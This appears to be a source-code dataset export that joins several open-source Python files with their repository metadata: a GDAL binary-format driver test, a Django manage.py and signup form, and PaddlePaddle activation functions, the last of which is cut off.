('CH131', 34, 'Single'),
('CH131', 333, 'Single'),
('CH131', 175, 'Single'),
('CH131', 273, 'Single'),
('CH131', 21, 'Single'),
('CH131', 91, 'Single'),
('CH131', 28, 'Single'),
('CH131', 670, 'Single'),
('CH131', 63, 'Single'),
('1056', 0, 'Single'),
('1056', 3, 'Single'),
('1056', 7, 'Single'),
('1058', 0, 'Single'),
('1058', 10, 'Single'),
('1058', 3, 'Single'),
('1059', 0, 'Multiple'),
('1059', 4, 'Multiple'),
('1059', 7, 'Multiple'),
('CH042', 0, 'Single'),
('CH042', 676, 'Single'),
('CH042', 424, 'Single'),
('CH042', 172, 'Single'),
('CH042', 21, 'Single'),
('CH042', 60, 'Single'),
('CH040', 0, 'Single'),
('CH040', 45, 'Single'),
('CH040', 412, 'Single'),
('CH040', 111, 'Single'),
('CAP45', 0, 'Single'),
('CAP45', 21, 'Single'),
('CH185', 0, 'Single'),
('CH185', 25, 'Single'),
('CH185', 67, 'Single'),
('CH185', 416, 'Single'),
('CH185', 180, 'Single'),
('K84', 0, 'Single'),
('K84', 24, 'Single'),
('6247', 0, 'Single'),
('6247', 2, 'Single'),
('R053', 0, 'Single'),
('R053', 8, 'Single'),
('R526', 0, 'Single'),
('R526', 65, 'Single'),
('703010200', 0, 'Multiple'),
('CH164', 0, 'Single'),
('CH164', 169, 'Single'),
('CH164', 420, 'Single'),
('CH164', 14, 'Single'),
('CH164', 56, 'Single'),
('WEAU', 0, 'Single'),
('WEAU', 8, 'Single'),
('WEAU', 29, 'Single'),
('WEAU', 197, 'Single'),
('WEAU', 15, 'Single'),
('CH162', 0, 'Single'),
('CH162', 179, 'Single'),
('CH162', 21, 'Single'),
('CH162', 438, 'Single'),
('CH162', 77, 'Single'),
('H386', 0, 'Single'),
('H386', 9, 'Single'),
('PIC55751', 0, 'Multiple'),
('191647', 0, 'Single'),
('191647', 127, 'Single'),
('PIC1362', 0, 'Single'),
('H408', 0, 'Multiple'),
('PIC38417', 0, 'Multiple'),
('PIC38417', 8, 'Multiple'),
('PIC71101', 0, 'Single'),
('PIC71101', 37, 'Single'),
('PIC71101', 6, 'Single'),
('PIC71101', 174, 'Single'),
('PIC71101', 14, 'Single'),
('PIC71101', 120, 'Single'),
('TT31P', 0, 'Single'),
('TT31P', 11, 'Single'),
('CH198', 0, 'Single'),
('CH198', 11, 'Single'),
('CH198', 60, 'Single'),
('CH198', 447, 'Single'),
('PIC38051', 0, 'Single'),
('PIC38051', 4, 'Single'),
('CH077', 0, 'Single'),
('CH077', 32, 'Single'),
('CH077', 14, 'Single'),
('CH077', 159, 'Single'),
('CH058', 0, 'Single'),
('CH058', 76, 'Single'),
('CH058', 36, 'Single'),
('CH607', 0, 'Single'),
('CH607', 21, 'Single'),
('CH607', 14, 'Single'),
('R463F', 0, 'Single'),
('R463F', 7, 'Single'),
('R463F', 236, 'Single'),
('R463F', 48, 'Single'), ]
| 31.472362
| 96
| 0.357975
|
794e252a6923a3e368203e7308f80bf4d86aac85
| 3,089
|
py
|
Python
|
autotest/gdrivers/genbin.py
|
tbonfort/gdal
|
173e0659bc3f2e6b97c2c07332a3066478afb821
|
[
"MIT"
] | 1
|
2015-04-21T19:52:03.000Z
|
2015-04-21T19:52:03.000Z
|
autotest/gdrivers/genbin.py
|
tbonfort/gdal
|
173e0659bc3f2e6b97c2c07332a3066478afb821
|
[
"MIT"
] | 7
|
2018-04-09T09:35:42.000Z
|
2018-05-22T06:54:05.000Z
|
autotest/gdrivers/genbin.py
|
pramsey/gdal
|
965421b79fe4d3332b0f2f633b072fdcab2b700a
|
[
"MIT"
] | 2
|
2018-05-08T01:51:34.000Z
|
2019-06-26T05:08:56.000Z
|
#!/usr/bin/env python
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test Generic Binary format driver.
# Author: Frank Warmerdam <warmerdam@pobox.com>
#
###############################################################################
# Copyright (c) 2007, Frank Warmerdam <warmerdam@pobox.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import sys
sys.path.append( '../pymod' )
import gdaltest
###############################################################################
# Perform simple read test.
def genbin_1():
tst = gdaltest.GDALTest( 'GenBin', 'tm4628_96.bil', 1, 5738,
0, 0, 500, 1 )
prj = """PROJCS["NAD27 / Washington South",
GEOGCS["NAD27",
DATUM["North_American_Datum_1927",
SPHEROID["Clarke 1866",6378206.4,294.9786982138982,
AUTHORITY["EPSG","7008"]],
AUTHORITY["EPSG","6267"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.01745329251994328,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4267"]],
UNIT["US survey foot",0.3048006096012192,
AUTHORITY["EPSG","9003"]],
PROJECTION["Lambert_Conformal_Conic_2SP"],
PARAMETER["standard_parallel_1",45.83333333333334],
PARAMETER["standard_parallel_2",47.33333333333334],
PARAMETER["latitude_of_origin",45.33333333333334],
PARAMETER["central_meridian",-120.5],
PARAMETER["false_easting",2000000],
PARAMETER["false_northing",0],
AUTHORITY["EPSG","32049"],
AXIS["X",EAST],
AXIS["Y",NORTH]]"""
gt = (1181700.9894981384, 82.021003723042099, 0.0,
596254.01050186157, 0.0, -82.021003723045894 )
return tst.testOpen( check_prj = prj, check_gt = gt )
gdaltest_list = [
genbin_1
]
if __name__ == '__main__':
gdaltest.setup_run( 'genbin' )
gdaltest.run_tests( gdaltest_list )
gdaltest.summarize()
| 35.505747
| 79
| 0.616704
|
794e25acc1e2d8199bffb7b683c74d17997c4047
| 254
|
py
|
Python
|
Alba/albaproject/manage.py
|
marcos-sb/quick-openstacked-hadoop
|
ae40d842b31a16e212d1474e9cd8e8f022be99a8
|
[
"Apache-2.0"
] | null | null | null |
Alba/albaproject/manage.py
|
marcos-sb/quick-openstacked-hadoop
|
ae40d842b31a16e212d1474e9cd8e8f022be99a8
|
[
"Apache-2.0"
] | null | null | null |
Alba/albaproject/manage.py
|
marcos-sb/quick-openstacked-hadoop
|
ae40d842b31a16e212d1474e9cd8e8f022be99a8
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "albaproject.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| 23.090909
| 75
| 0.775591
|
794e26220fe4d90ac9f974ada53e62b4fe0a538b
| 2,123
|
py
|
Python
|
users/forms.py
|
edevars/taco_blog
|
b21ffee6899e07928f40ec85a8ff40872b9a77a9
|
[
"MIT"
] | null | null | null |
users/forms.py
|
edevars/taco_blog
|
b21ffee6899e07928f40ec85a8ff40872b9a77a9
|
[
"MIT"
] | null | null | null |
users/forms.py
|
edevars/taco_blog
|
b21ffee6899e07928f40ec85a8ff40872b9a77a9
|
[
"MIT"
] | null | null | null |
# Django
from django import forms
from django.contrib.auth.models import User
from users.models import Profile
class SignupForm(forms.Form):
"""Sign up form."""
username = forms.CharField(label=False, min_length=4, max_length=50, widget=forms.TextInput(
attrs={'placeholder': 'Usuario', 'class': 'input mb-4', 'required': True}))
password = forms.CharField(label=False, max_length=70, widget=forms.PasswordInput(
attrs={'placeholder': 'Escribe tu contraseña', 'class': 'input mb-4', 'required': True}))
password_confirmation = forms.CharField(label=False, max_length=70, widget=forms.PasswordInput(
attrs={'placeholder': 'Confirma tu contraseña', 'class': 'input mb-4', 'required': True}))
first_name = forms.CharField(label=False, min_length=2, max_length=50, widget=forms.TextInput(
attrs={'placeholder': 'Nombres', 'class': 'input mb-4', 'required': True}))
last_name = forms.CharField(label=False, min_length=2, max_length=50, widget=forms.TextInput(
attrs={'placeholder': 'Apellidos', 'class': 'input mb-4', 'required': True}))
email = forms.EmailField(label=False, min_length=6, max_length=70, widget=forms.EmailInput(
attrs={'placeholder': 'Correo electrónico', 'class': 'input mb-4', 'required': True}))
def clean_username(self):
username = self.cleaned_data['username']
username_taken = User.objects.filter(username=username).exists()
if username_taken:
raise forms.ValidationError('Username is already in use.')
return username
def clean(self):
data = super().clean()
password = data['password']
password_confirmation = data['password_confirmation']
if password != password_confirmation:
raise forms.ValidationError('Passwords do not match.')
return data
def save(self):
"""Create user and profile."""
data = self.cleaned_data
data.pop('password_confirmation')
user = User.objects.create_user(**data)
profile = Profile(user=user)
profile.save()
return data
| 37.910714
| 99
| 0.666039
|
794e2659302473b0b01ac49d4338d959051e567f
| 51,260
|
py
|
Python
|
python/paddle/nn/functional/activation.py
|
DevilCarp/Paddle
|
04325d2cbefb029a4478bdc069d3279cd566ac6a
|
[
"Apache-2.0"
] | 2
|
2022-03-30T09:55:45.000Z
|
2022-03-30T09:55:49.000Z
|
python/paddle/nn/functional/activation.py
|
DevilCarp/Paddle
|
04325d2cbefb029a4478bdc069d3279cd566ac6a
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/nn/functional/activation.py
|
DevilCarp/Paddle
|
04325d2cbefb029a4478bdc069d3279cd566ac6a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ...fluid.layers import sigmoid # noqa: F401
from ...tensor.math import tanh # noqa: F401
from ...tensor.math import tanh_ # noqa: F401
from ...fluid.dygraph.inplace_utils import inplace_apis_in_dygraph_only
from ...tensor.manipulation import chunk
from ...tensor.math import multiply
import warnings
from ...fluid.layer_helper import LayerHelper
from ...fluid.framework import convert_np_dtype_to_dtype_
from ...fluid.data_feeder import check_variable_and_dtype, check_dtype
import paddle
from paddle import _C_ops, in_dynamic_mode
from paddle.framework import core
__all__ = []
def celu(x, alpha=1.0, name=None):
r"""
celu activation.
.. math::
celu(x) = max(0, x) + min(0, \alpha * (e^{x/\alpha}-1))
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
alpha (float, optional): The 'alpha' value of the CELU formulation. Default is 1.0.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([[-1., 6.], [1., 15.6]])
out = F.celu(x, alpha=0.2)
# [[-0.19865242, 6. ],
# [ 1. , 15.60000038]]
"""
if alpha == 0:
raise ZeroDivisionError("alpha cannot be 0 for celu")
if in_dynamic_mode():
return _C_ops.celu(x, 'alpha', alpha)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'celu')
helper = LayerHelper("celu", **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='celu',
inputs={'X': x},
outputs={'Out': out},
attrs={'alpha': alpha})
return out
def elu(x, alpha=1.0, name=None):
r"""
elu activation.
.. math::
elu(x)=
\left\{
\begin{array}{lcl}
x,& &\text{if } \ x > 0 \\
alpha * (e^{x} - 1),& &\text{if } \ x <= 0
\end{array}
\right.
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
alpha (float, optional): The 'alpha' value of the ELU formulation. Default is 1.0.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([[-1., 6.], [1., 15.6]])
out = F.elu(x, alpha=0.2)
# [[-0.12642411 6. ]
# [ 1. 15.6 ]]
"""
if in_dynamic_mode():
return _C_ops.elu(x, 'alpha', alpha)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'elu')
helper = LayerHelper("elu", **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='elu',
inputs={'X': x},
outputs={'Out': out},
attrs={'alpha': alpha})
return out
@inplace_apis_in_dygraph_only
def elu_(x, alpha=1.0, name=None):
r"""
Inplace version of ``elu`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_nn_cn_elu`.
"""
assert alpha >= 0., "elu_ only support alpha >= 0, please use elu instead."
return _C_ops.elu_(x, 'alpha', alpha)
def gelu(x, approximate=False, name=None):
r"""
gelu activation.
if approximate is True
.. math::
gelu(x) = 0.5 * x * (1 + tanh(\sqrt{\frac{2}{\pi}} * (x + 0.044715x^{3})))
else
.. math::
gelu(x) = 0.5 * x * (1 + erf(\frac{x}{\sqrt{2}}))
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
approximate (bool, optional): Wether to enable approximation. Default is False.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([[-1, 0.5], [1, 1.5]])
out1 = F.gelu(x)
# [[-0.15865529, 0.34573123],
# [ 0.84134471, 1.39978933]]
out2 = F.gelu(x, True)
# [[-0.15880799, 0.34571400],
# [ 0.84119201, 1.39957154]]
"""
if in_dynamic_mode():
return _C_ops.gelu(x, 'approximate', approximate)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'gelu')
helper = LayerHelper("gelu", **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='gelu',
inputs={'X': x},
outputs={'Out': out},
attrs={'approximate': approximate})
return out
def hardshrink(x, threshold=0.5, name=None):
r"""
hard shrinkage activation
.. math::
hardshrink(x)=
\left\{
\begin{array}{rcl}
x,& &if \ {x > threshold} \\
x,& &if \ {x < -threshold} \\
0,& &if \ {others} &
\end{array}
\right.
Args:
x (Tensor): The input Tensor with data type float32, float64.
threshold (float, optional): The value of threshold for hardthrink. Default is 0.5
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([-1, 0.3, 2.5])
out = F.hardshrink(x) # [-1., 0., 2.5]
"""
if in_dynamic_mode():
return _C_ops.hard_shrink(x, 'threshold', threshold)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'hardshrink')
helper = LayerHelper('hardshrink', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='hard_shrink',
inputs={'X': x},
outputs={'Out': out},
attrs={'threshold': threshold})
return out
def hardtanh(x, min=-1.0, max=1.0, name=None):
r"""
hardtanh activation
.. math::
hardtanh(x)=
\left\{
\begin{array}{cll}
max,& & \text{if } x > max \\
min,& & \text{if } x < min \\
x,& & \text{otherwise}
\end{array}
\right.
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
min (float, optional): The minimum value of the linear region range. Default is -1.
max (float, optional): The maximum value of the linear region range. Default is 1.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([-1.5, 0.3, 2.5]))
out = F.hardtanh(x) # [-1., 0.3, 1.]
"""
if in_dynamic_mode():
return _C_ops.brelu(x, 't_min', min, 't_max', max)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'hardtanh')
helper = LayerHelper('hardtanh', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='brelu',
inputs={'X': x},
outputs={'Out': out},
attrs={'t_min': min,
't_max': max})
return out
def hardsigmoid(x, slope=0.1666667, offset=0.5, name=None):
r"""
hardsigmoid activation.
A 3-part piecewise linear approximation of sigmoid(https://arxiv.org/abs/1603.00391),
which is much faster than sigmoid.
.. math::
hardsigmoid(x)=
\left\{
\begin{array}{lcl}
0, & &\text{if } \ x \leq -3 \\
1, & &\text{if } \ x \geq 3 \\
slope * x + offset, & &\text{otherwise}
\end{array}
\right.
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
slope (float, optional): The slope of hardsigmoid function. Default is 0.1666667.
offset (float, optional): The offset of hardsigmoid function. Default is 0.5.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([-4., 5., 1.])
out = F.hardsigmoid(x) # [0., 1., 0.666667]
"""
if in_dynamic_mode():
return _C_ops.hard_sigmoid(x, 'slope', slope, 'offset', offset)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'hardsigmoid')
helper = LayerHelper('hardsigmoid', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='hard_sigmoid',
inputs={'X': x},
outputs={'Out': out},
attrs={'slope': slope,
'offset': offset})
return out
def hardswish(x, name=None):
r"""
hardswish activation
hardswish is proposed in MobileNetV3, and performs better in computational stability
and efficiency compared to swish function. For more details please refer
to: https://arxiv.org/pdf/1905.02244.pdf
.. math::
hardswish(x)=
\left\{
\begin{array}{cll}
0 &, & \text{if } x \leq -3 \\
x &, & \text{if } x \geq 3 \\
\frac{x(x+3)}{6} &, & \text{otherwise}
\end{array}
\right.
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([-4., 5., 1.])
out = F.hardswish(x) # [0., 5., 0.666667]
"""
if in_dynamic_mode():
return _C_ops.hard_swish(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'hardswish')
helper = LayerHelper('hardswish', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='hard_swish', inputs={'X': x}, outputs={'Out': out})
return out
def leaky_relu(x, negative_slope=0.01, name=None):
r"""
leaky_relu activation
.. math::
leaky\_relu(x)=
\left\{
\begin{array}{rcl}
x, & & if \ x >= 0 \\
negative\_slope * x, & & otherwise \\
\end{array}
\right.
Args:
x (Tensor): The input Tensor with data type float32, float64.
negative_slope (float, optional): Slope of the activation function at
:math:`x < 0` . Default is 0.01.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([-2., 0., 1.])
out = F.leaky_relu(x) # [-0.02, 0., 1.]
"""
if in_dynamic_mode():
return _C_ops.leaky_relu(x, 'alpha', negative_slope)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'leaky_relu')
helper = LayerHelper('leaky_relu', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='leaky_relu',
inputs={'X': x},
outputs={'Out': out},
attrs={'alpha': negative_slope})
return out
def prelu(x, weight, data_format="NCHW", name=None):
"""
prelu activation.
.. math::
prelu(x) = max(0, x) + weight * min(0, x)
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
weight (Tensor): The learnable parameter with data type same as ``x``.
The weight shape is [1] or [in], where `in` is the input channel of ``x``.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
data_format(str, optional): Data format that specifies the layout of input.
It may be "NC", "NCL", "NCHW", "NCDHW", "NLC", "NHWC" or "NDHWC". Default: "NCHW".
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
data = np.array([[[[-2.0, 3.0, -4.0, 5.0],
[ 3.0, -4.0, 5.0, -6.0],
[-7.0, -8.0, 8.0, 9.0]],
[[ 1.0, -2.0, -3.0, 4.0],
[-5.0, 6.0, 7.0, -8.0],
[ 6.0, 7.0, 8.0, 9.0]]]], 'float32')
x = paddle.to_tensor(data)
w = paddle.to_tensor(np.array([0.25]).astype('float32'))
out = F.prelu(x, w)
# [[[[-0.5 , 3. , -1. , 5. ],
# [ 3. , -1. , 5. , -1.5 ],
# [-1.75, -2. , 8. , 9. ]],
# [[ 1. , -0.5 , -0.75, 4. ],
# [-1.25, 6. , 7. , -2. ],
# [ 6. , 7. , 8. , 9. ]]]]
"""
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'prelu')
check_variable_and_dtype(weight, 'weight',
['float16', 'float32', 'float64'], 'prelu')
assert len(weight.shape
) == 1, "The dim count of weight shape should be 1 in prelu()."
mode = 'all'
if weight.shape[0] > 1:
true_data_format = [
'NC', 'NCL', 'NCHW', 'NCDHW', 'NLC', 'NHWC', 'NDHWC'
]
if data_format not in true_data_format:
raise ValueError(
"data_format must be one of 'NC', 'NCL', 'NCHW', 'NCDHW', "
"'NLC', 'NHWC', 'NDHWC' but receive {}".format(data_format))
data_format = 'NCHW' if data_format[1] == 'C' else 'NHWC'
assert len(
x.shape
) > 1, "The dim count of x should be equal or larger than 2 in prelu() when weight shape is not [1]."
#NOTE(GuoxiaWang): support NHWC data format
if data_format == 'NHWC':
assert weight.shape[0] == x.shape[
-1], "The weight size should be equal to x input channel in prelu() when weight shape is not [1]."
else:
assert weight.shape[0] == x.shape[
1], "The weight size should be equal to x input channel in prelu() when weight shape is not [1]."
mode = 'channel'
if in_dynamic_mode():
return _C_ops.prelu(x, weight, 'mode', mode, 'data_format', data_format)
helper = LayerHelper('prelu', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type="prelu",
inputs={"X": x,
"Alpha": weight},
outputs={"Out": out},
attrs={"mode": mode,
"data_format": data_format})
return out
def relu(x, name=None):
"""
relu activation.
.. math::
out = max(x, 0)
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([-2, 0, 1]).astype('float32'))
out = F.relu(x) # [0., 0., 1.]
"""
if in_dynamic_mode():
return _C_ops.relu(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'relu')
helper = LayerHelper('relu', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='relu', inputs={'X': x}, outputs={'Out': out})
return out
@inplace_apis_in_dygraph_only
def relu_(x, name=None):
"""
Inplace version of ``relu`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_nn_cn_relu`.
"""
if paddle.fluid.framework._in_eager_mode_:
return _C_ops.final_state_relu_(x)
return _C_ops.relu_(x)
def log_sigmoid(x, name=None):
r"""
log_sigmoid activation.
.. math::
log\_sigmoid(x) = log \frac{1}{1 + e^{-x}}
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([1.0, 2.0, 3.0, 4.0])
out = F.log_sigmoid(x) # [-0.313262 -0.126928 -0.0485874 -0.0181499]
"""
if in_dynamic_mode():
return _C_ops.logsigmoid(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'log_sigmoid')
helper = LayerHelper("log_sigmoid", **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='logsigmoid', inputs={'X': x}, outputs={'Out': out})
return out
def maxout(x, groups, axis=1, name=None):
r"""
maxout activation.
Assumed the input shape is (N, Ci, H, W).
The output shape is (N, Co, H, W).
Then Co = Ci/groups and the operator formula is as follows:
.. math::
\begin{array}{l}
&out_{si+j} = \max_{k} x_{gsi + sk + j} \\
&g = groups \\
&s = \frac{input.size}{num\_channels} \\
&0 \le i < \frac{num\_channels}{groups} \\
&0 \le j < s \\
&0 \le k < groups
\end{array}
Parameters:
x (Tensor): The input is 4-D Tensor with shape [N, C, H, W] or [N, H, W, C], the data type
of input is float32 or float64.
groups (int, optional): The groups number of maxout. `groups` specifies the
index of channel dimension where maxout will be performed. This must be
a factor of number of features. Default is 1.
axis (int, optional): The axis along which to perform maxout calculations.
It should be 1 when data format is NCHW, be -1 or 3 when data format
is NHWC. If ``axis`` < 0, it works the same way as :math:`axis + D` ,
where D is the dimensions of ``x`` . ``axis`` only supports 1, 3 or -1.
Default is 1.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.rand([1, 2, 3, 4])
# [[[[0.5002636 0.22272532 0.17402348 0.2874594 ]
# [0.95313174 0.6228939 0.7129065 0.7087491 ]
# [0.02879342 0.88725346 0.61093384 0.38833922]]
# [[0.5231306 0.03807496 0.91661984 0.15602879]
# [0.666127 0.616567 0.30741522 0.24044901]
# [0.7142536 0.7351477 0.31588817 0.23782359]]]]
out = F.maxout(x, groups=2)
# [[[[0.5231306 0.22272532 0.91661984 0.2874594 ]
# [0.95313174 0.6228939 0.7129065 0.7087491 ]
# [0.7142536 0.88725346 0.61093384 0.38833922]]]]
"""
if in_dynamic_mode():
return _C_ops.maxout(x, 'groups', groups, 'axis', axis)
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'maxout')
if axis not in [1, -1, 3]:
raise ValueError(
"Attr(axis) should be 1 when data format is NCHW, -1 or 3 when data format is NHWC. Received "
"Attr(axis): %s." % str(axis))
if axis == -1:
axis = 3
helper = LayerHelper('maxout', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='maxout',
inputs={'X': x},
outputs={'Out': out},
attrs={'groups': groups,
'axis': axis})
return out
def relu6(x, name=None):
"""
relu6 activation
.. math::
relu6(x) = min(max(0,x), 6)
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([-1, 0.3, 6.5]))
out = F.relu6(x) # [0, 0.3, 6]
"""
threshold = 6.0
if in_dynamic_mode():
return _C_ops.relu6(x, 'threshold', threshold)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'relu6')
helper = LayerHelper('relu6', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='relu6',
inputs={'X': x},
outputs={'Out': out},
attrs={'threshold': threshold})
return out
def selu(x,
scale=1.0507009873554804934193349852946,
alpha=1.6732632423543772848170429916717,
name=None):
r"""
selu activation
.. math::
selu(x)= scale *
\left\{
\begin{array}{lcl}
x,& &\text{if } \ x > 0 \\
alpha * e^{x} - alpha,& &\text{if } \ x <= 0
\end{array}
\right.
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
scale (float, optional): The value of scale(must be greater than 1.0) for selu. Default is 1.0507009873554804934193349852946
alpha (float, optional): The value of alpha(must be no less than zero) for selu. Default is 1.6732632423543772848170429916717
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([[0.0, 1.0],[2.0, 3.0]]))
out = F.selu(x) # [[0, 1.050701],[2.101402, 3.152103]]
"""
if scale <= 1.0:
raise ValueError(
"The scale must be greater than 1.0. Received: {}.".format(scale))
if alpha < 0:
raise ValueError(
"The alpha must be no less than zero. Received: {}.".format(alpha))
if in_dynamic_mode():
return _C_ops.selu(x, 'scale', scale, 'alpha', alpha)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'selu')
helper = LayerHelper('selu', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='selu',
inputs={'X': x},
outputs={'Out': out},
attrs={'scale': scale,
'alpha': alpha})
return out
def silu(x, name=None):
r"""
silu activation
.. math::
silu(x) = \frac{x}{1 + e^{-x}}
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([1.0, 2.0, 3.0, 4.0])
